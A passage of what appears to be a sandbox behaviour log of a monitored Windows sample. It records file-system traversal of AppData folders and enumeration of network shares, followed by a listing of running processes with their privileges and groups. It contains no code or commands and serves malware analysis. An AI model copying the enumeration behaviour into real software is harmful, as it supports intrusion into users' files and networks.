ftLastAccessTime.dwLowDateTime=0xea6d44d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.384] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.384] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.384] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.384] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.384] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.384] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.384] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.384] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.385] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.385] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.385] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.385] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.385] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.385] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.385] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.385] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.386] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.386] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.386] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.386] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xfaeead90, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xfeca8830, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.389] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.389] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.389] SendMessageW (hWnd=0x20164, Msg=0x8003, wParam=0x0, lParam=0x0) returned 0x0 Thread: id = 330 os_tid = 0x644 [0145.412] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x3a5fee0 | out: lphEnum=0x3a5fee0*=0x3220d18) returned 0x0 [0145.449] WNetEnumResourceW (in: hEnum=0x3220d18, lpcCount=0x3a5fedc, lpBuffer=0x3298258, lpBufferSize=0x3a5fed8 | out: lpcCount=0x3a5fedc, lpBuffer=0x3298258, lpBufferSize=0x3a5fed8) returned 0x0 [0145.449] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6910 [0145.449] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6958 [0145.449] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x70) returned 0x31f3c20 [0145.449] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f69a0 [0145.449] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f69e8 [0145.449] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x3298258, lphEnum=0x3a5fe28 | out: lphEnum=0x3a5fe28*=0x727348) returned 0x0 [0145.453] WNetEnumResourceW (in: hEnum=0x727348, lpcCount=0x3a5fe24, lpBuffer=0x3a60048, lpBufferSize=0x3a5fe20 | out: lpcCount=0x3a5fe24, lpBuffer=0x3a60048, lpBufferSize=0x3a5fe20) returned 0x103 [0145.453] WNetCloseEnum (hEnum=0x727348) returned 0x0 [0145.453] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6958 | out: hHeap=0x6e0000) returned 1 [0145.453] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6910 | out: hHeap=0x6e0000) returned 1 [0145.453] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6910 [0145.453] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6958 [0145.453] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xe0) returned 0x7360c0 [0145.453] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f61c0 [0145.453] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6a78 [0145.453] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f69e8 | out: hHeap=0x6e0000) returned 1 [0145.453] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f69a0 | out: hHeap=0x6e0000) returned 1 [0145.453] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f3c20 | out: hHeap=0x6e0000) returned 1 [0145.453] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f69a0 [0145.453] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f69e8 [0145.453] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x3298278, lphEnum=0x3a5fe28 | out: lphEnum=0x3a5fe28*=0x3a5fe44) returned 0x4b8 [0158.248] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6958 | out: hHeap=0x6e0000) returned 1 [0158.248] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6910 | out: hHeap=0x6e0000) returned 1 [0158.248] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e6d0 [0158.248] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5b8 [0158.248] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x150) returned 0x711b30 [0158.248] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6910 [0158.248] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6958 [0158.248] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6520 [0158.248] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0158.248] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6a78 | out: hHeap=0x6e0000) returned 1 [0158.248] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f61c0 | out: hHeap=0x6e0000) returned 1 [0158.248] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f69e8 | out: hHeap=0x6e0000) returned 1 [0158.248] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f69a0 | out: hHeap=0x6e0000) returned 1 [0158.248] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7360c0 | out: hHeap=0x6e0000) returned 1 [0158.248] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e708 [0158.248] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5f0 [0158.248] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x3298298, lphEnum=0x3a5fe28 | out: lphEnum=0x3a5fe28*=0x3a5fe44) returned 0x4c6 [0158.250] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5b8 | out: hHeap=0x6e0000) returned 1 [0158.250] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e6d0 | out: hHeap=0x6e0000) returned 1 [0158.250] WNetEnumResourceW (in: hEnum=0x3220d18, lpcCount=0x3a5fedc, lpBuffer=0x3298258, lpBufferSize=0x3a5fed8 | out: lpcCount=0x3a5fedc, lpBuffer=0x3298258, lpBufferSize=0x3a5fed8) returned 0x103 [0158.250] WNetCloseEnum (hEnum=0x3220d18) returned 0x0 [0158.250] SendMessageW (hWnd=0x20164, Msg=0x8004, wParam=0x0, lParam=0x0) returned 0x0 Thread: id = 338 os_tid = 0x650 Thread: id = 353 os_tid = 0x4cc Process: id = "20" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x8ca1000" os_pid = "0xc8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "19" os_parent_pid = "0x4d4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dbf3" [0xc000000f], "LOCAL" [0x7] Thread: id = 197 os_tid = 0x7e0 Thread: id = 198 os_tid = 0x7c0 Thread: id = 199 os_tid = 0x7a8 Thread: id = 200 os_tid = 0x794 Thread: id = 201 os_tid = 0x5e4 Thread: id = 202 os_tid = 0x158 Thread: id = 203 os_tid = 0x148 Thread: id = 204 os_tid = 0x150 Thread: id = 205 os_tid = 0x134 Thread: id = 206 os_tid = 0x130 Thread: id = 207 os_tid = 0xf0 Thread: id = 242 os_tid = 0x464 Thread: id = 243 os_tid = 0x434 Thread: id = 244 os_tid = 0x4e4 Thread: id = 245 os_tid = 0x4ec Thread: id = 246 os_tid = 0x52c Thread: id = 352 os_tid = 0x480 Thread: id = 354 os_tid = 0x7d8 Process: id = "21" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x7991000" os_pid = "0x378" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "20" os_parent_pid = "0xc8" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e0dc" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 208 os_tid = 0x660 Thread: id = 209 os_tid = 0x624 Thread: id = 210 os_tid = 0x61c Thread: id = 211 os_tid = 0x60c Thread: id = 212 os_tid = 0x604 Thread: id = 213 os_tid = 0x5f8 Thread: id = 214 os_tid = 0x5f0 Thread: id = 215 os_tid = 0x5e0 Thread: id = 216 os_tid = 0x5dc Thread: id = 217 os_tid = 0x594 Thread: id = 218 os_tid = 0x584 Thread: id = 219 os_tid = 0x56c Thread: id = 220 os_tid = 0x550 Thread: id = 221 os_tid = 0x4f4 Thread: id = 222 os_tid = 0x4f0 Thread: id = 223 os_tid = 0x4c4 Thread: id = 224 os_tid = 0x4c0 Thread: id = 225 os_tid = 0x4bc Thread: id = 226 os_tid = 0x4b8 Thread: id = 227 os_tid = 0x4b4 Thread: id = 228 os_tid = 0x4a4 Thread: id = 229 os_tid = 0x4a0 Thread: id = 230 os_tid = 0x49c Thread: id = 231 os_tid = 0x498 Thread: id = 232 os_tid = 0x48c Thread: id = 233 os_tid = 0x41c Thread: id = 234 os_tid = 0x40c Thread: id = 235 os_tid = 0x408 Thread: id = 236 os_tid = 0x12c Thread: id = 237 os_tid = 0x294 Thread: id = 238 os_tid = 0x174 Thread: id = 239 os_tid = 0x3d4 Thread: id = 240 os_tid = 0x3a4 Thread: id = 241 os_tid = 0x3a0 Thread: id = 247 os_tid = 0x508 Thread: id = 283 os_tid = 0x360 Thread: id = 356 os_tid = 0x344 Thread: id = 359 os_tid = 0x7b4 Thread: id = 391 os_tid = 0x3b4 Thread: id = 392 os_tid = 0x638 Process: id = "22" image_name = "mobsync.exe" filename = "c:\\windows\\system32\\mobsync.exe" page_root = "0x70133000" os_pid = "0x214" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "21" os_parent_pid = "0x378" cmd_line = "C:\\Windows\\System32\\mobsync.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e0dc" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 248 os_tid = 0x4f8 Thread: id = 249 os_tid = 0x328 Thread: id = 250 os_tid = 0x32c Thread: id = 251 os_tid = 0x470 Thread: id = 252 os_tid = 0x4d0 Thread: id = 253 os_tid = 0x170 Thread: id = 254 os_tid = 0x1c0 Thread: id = 255 os_tid = 0x218 Thread: id = 256 os_tid = 0x344 Process: id = "23" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x78434000" os_pid = "0x560" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "rpc_server" parent_id = "20" os_parent_pid = "0xc8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalServiceNoNetwork" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BFE" [0xe], "NT SERVICE\\DPS" [0xa], "NT SERVICE\\MpsSvc" [0xa], "NT SERVICE\\pla" [0xa], "NT SERVICE\\WwanSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00016b38" [0xc000000f], "LOCAL" [0x7], "NT AUTHORITY\\WRITE RESTRICTED" [0x7] Thread: id = 257 os_tid = 0x554 Thread: id = 258 os_tid = 0x13c Thread: id = 259 os_tid = 0x404 Thread: id = 260 os_tid = 0x7fc Thread: id = 261 os_tid = 0x7f4 Thread: id = 262 os_tid = 0x7ec Thread: id = 263 os_tid = 0x7dc Thread: id = 264 os_tid = 0x7cc Thread: id = 265 os_tid = 0x798 Thread: id = 266 os_tid = 0x6b0 Thread: id = 267 os_tid = 0x6ac Thread: id = 268 os_tid = 0x6a8 Thread: id = 269 os_tid = 0x6a4 Thread: id = 270 os_tid = 0x694 Thread: id = 271 os_tid = 0x670 Thread: id = 272 os_tid = 0x664 Thread: id = 273 os_tid = 0x65c Thread: id = 274 os_tid = 0x63c Thread: id = 275 os_tid = 0x608 Thread: id = 276 os_tid = 0x5d4 Thread: id = 277 os_tid = 0x5b0 Thread: id = 278 os_tid = 0x5a4 Thread: id = 279 os_tid = 0x570 Thread: id = 280 os_tid = 0x564 Thread: id = 355 os_tid = 0x4f8 Thread: id = 357 os_tid = 0x5e8 Process: id = "24" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x918d000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "19" os_parent_pid = "0x4d4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cd26" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 284 os_tid = 0x4b0 Thread: id = 285 os_tid = 0x484 Thread: id = 286 os_tid = 0x4a0 Thread: id = 287 os_tid = 0x49c Thread: id = 288 os_tid = 0x7c4 Thread: id = 289 os_tid = 0x7a4 Thread: id = 290 os_tid = 0x790 Thread: id = 291 os_tid = 0x78c Thread: id = 292 os_tid = 0x788 Thread: id = 293 os_tid = 0x784 Thread: id = 294 os_tid = 0x780 Thread: id = 295 os_tid = 0x77c Thread: id = 296 os_tid = 0x76c Thread: id = 297 os_tid = 0x764 Thread: id = 298 os_tid = 0x75c Thread: id = 299 os_tid = 0x758 Thread: id = 300 os_tid = 0x750 Thread: id = 301 os_tid = 0x74c Thread: id = 302 os_tid = 0x748 Thread: id = 303 os_tid = 0x740 Thread: id = 304 os_tid = 0x73c Thread: id = 305 os_tid = 0x738 Thread: id = 306 os_tid = 0x734 Thread: id = 307 os_tid = 0x72c Thread: id = 308 os_tid = 0x710 Thread: id = 309 os_tid = 0x428 Thread: id = 310 os_tid = 0x42c Thread: id = 311 os_tid = 0x528 Thread: id = 312 os_tid = 0x4e8 Thread: id = 313 os_tid = 0x4ac Thread: id = 314 os_tid = 0x494 Thread: id = 315 os_tid = 0x490 Thread: id = 316 os_tid = 0x488 Thread: id = 317 os_tid = 0x188 Thread: id = 318 os_tid = 0x118 Thread: id = 319 os_tid = 0x3fc Thread: id = 320 os_tid = 0x3f4 Thread: id = 321 os_tid = 0x3e8 Thread: id = 322 os_tid = 0x39c Thread: id = 323 os_tid = 0x398 Thread: id = 324 os_tid = 0x394 Thread: id = 325 os_tid = 0x390 Thread: id = 326 os_tid = 0x37c Thread: id = 327 os_tid = 0x374 Thread: id = 339 os_tid = 0x64c Thread: id = 340 os_tid = 0x648 Thread: id = 341 os_tid = 0x628 Thread: id = 342 os_tid = 0x274 Thread: id = 343 os_tid = 0x5dc Thread: id = 344 os_tid = 0x7a0 Thread: id = 345 os_tid = 0x7b0 Thread: id = 346 os_tid = 0x7ac Thread: id = 347 os_tid = 0x438 Thread: id = 348 os_tid = 0x52c Thread: id = 349 os_tid = 0x330 Thread: id = 350 os_tid = 0x1d4 Thread: id = 351 os_tid = 0x4c8 Thread: id = 358 os_tid = 0x34c Thread: id = 360 os_tid = 0x114 Thread: id = 361 os_tid = 0x1e4 Thread: id = 362 os_tid = 0x120 Thread: id = 363 os_tid = 0x90 Thread: id = 364 os_tid = 0xc4 Thread: id = 365 os_tid = 0x50c Thread: id = 366 os_tid = 0x518 Thread: id = 367 os_tid = 0xc0 Thread: id = 389 os_tid = 0x578 Thread: id = 390 os_tid = 0x598 Process: id = "25" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x6da52000" os_pid = "0x66c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "21" os_parent_pid = "0x378" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e0dc" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 331 os_tid = 0x5c4 Thread: id = 332 os_tid = 0x700 Thread: id = 333 os_tid = 0x6e8 Thread: id = 334 os_tid = 0x5ec Thread: id = 335 os_tid = 0x6a0 Thread: id = 336 os_tid = 0x69c Thread: id = 337 os_tid = 0x690 Process: id = "26" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xd27c000" os_pid = "0x2c8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "21" os_parent_pid = "0x378" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b5a8" [0xc000000f], "LOCAL" [0x7] Thread: id = 368 os_tid = 0x31c Thread: id = 369 os_tid = 0x204 Thread: id = 370 os_tid = 0x5a8 Thread: id = 371 os_tid = 0x7e8 Thread: id = 372 os_tid = 0x688 Thread: id = 373 os_tid = 0x684 Thread: id = 374 os_tid = 0x680 Thread: id = 375 os_tid = 0x600 Thread: id = 376 os_tid = 0x458 Thread: id = 377 os_tid = 0x448 Thread: id = 378 os_tid = 0x43c Thread: id = 379 os_tid = 0x418 Thread: id = 380 os_tid = 0x3c0 Thread: id = 381 os_tid = 0x3b8 Thread: id = 382 os_tid = 0x3a8 Thread: id = 383 os_tid = 0x2fc Thread: id = 384 os_tid = 0x2f8 Thread: id = 385 os_tid = 0x2e4 Thread: id = 386 os_tid = 0x2d4 Thread: id = 387 os_tid = 0x2cc Thread: id = 388 os_tid = 0x5c8